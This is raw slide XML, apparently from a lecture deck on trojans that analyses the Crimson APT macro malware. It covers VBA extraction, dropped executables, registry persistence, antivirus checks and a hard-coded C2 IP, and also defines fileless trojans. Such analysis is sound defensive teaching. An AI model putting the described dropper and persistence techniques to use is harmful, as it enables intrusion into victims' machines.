            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25974598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90005" y="1244600"/>
            <a:ext cx="8363989" cy="4972762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Now, I am extracting VBA from excel file and dumping it to txt file. For that command I am running is: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd&gt; olevba.py –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deofb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;filename&gt; &gt;  Path\output.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>From the VBA code, I can see the subroutine creates a folder and drop executable file at location C:\ProgramData\Rlmdias\Rlmdias.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776762" y="1366646"/>
            <a:ext cx="7590473" cy="5163503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3967244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813" y="1506866"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>I opened excel and navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>VBAProject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> by clicking Alt+F11. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Porject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> was password protect. I removed password using GitHub code and check out my previous blog how it can be done. Post password removal, I can see there is a userForm1 which has two text box and has a hex values which are PE files will dropped depends on the OS version of the victim 32bit or 64bit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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573" y="1336104"/>
            <a:ext cx="8539402" cy="5015613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274118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7282" y="1491101"/>
            <a:ext cx="8027987" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>I debugged the VBA code and it dropped a zip file at location “C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Rlmdias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\ drngervia.zip” and unzip it using function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>unSadozip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792381" y="1491101"/>
            <a:ext cx="7862888" cy="4655820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3069271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Dropped zip file has drngervia.exe file. and Shell command execute the executable file</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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8903" y="3194600"/>
            <a:ext cx="6592220" cy="1505160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24987911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11971" y="1412272"/>
            <a:ext cx="8411286" cy="4752045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无文件木马：木马不是一个独立可执行的文件，而是通过特定方式隐藏在其它文件中，通过其它软件来触发执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档中的宏；一段可解释执行的语言代码，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码段；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本；配置文件中一段脚本；注册表中的一个键值等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通常功能比较简单，只是攻击的第一步，执行后再下载更多的攻击代码到目标机器中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10919506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when Shell executed, it opens Windows features and ask to download and Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Framework 3.5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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465" y="1101725"/>
            <a:ext cx="7506748" cy="5306165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425233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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="954088" y="1311822"/>
            <a:ext cx="7181850" cy="4991100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="687804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I have used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dnSpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> to debug the PE file. Looking at the code, it creates persistence creating a registry entry</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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124" y="3159508"/>
            <a:ext cx="9144000" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130688003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It gets the list of running process on the system</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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7167" y="1281755"/>
            <a:ext cx="5315692" cy="4925112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2295226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It looks for antivirus software running on the system. It searches for the antivirus software from the below list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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5240" y="3212282"/>
            <a:ext cx="5932998" cy="2617835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="3373438"/>
            <a:ext cx="1914525" cy="2295525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317298001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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="887413" y="1677988"/>
            <a:ext cx="7315200" cy="3867150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352644168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I have also found the hard coded IP address, username. Malware never hit to this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> [124.115.201. 118]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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938" y="3137755"/>
            <a:ext cx="7224768" cy="2983646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253941471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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182688" y="1307059"/>
            <a:ext cx="6724650" cy="5000625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2316363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11517" y="1412273"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>CobalStrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制过程中的几个名词</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472966" y="2133600"/>
            <a:ext cx="8471009" cy="4724400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358565480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69532" y="2518582"/>
            <a:ext cx="7004936" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>三、一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马技术分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896A0B84-C222-4B44-B676-9C0BC479113E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4339418"/>
            <a:ext cx="6400800" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35436618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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
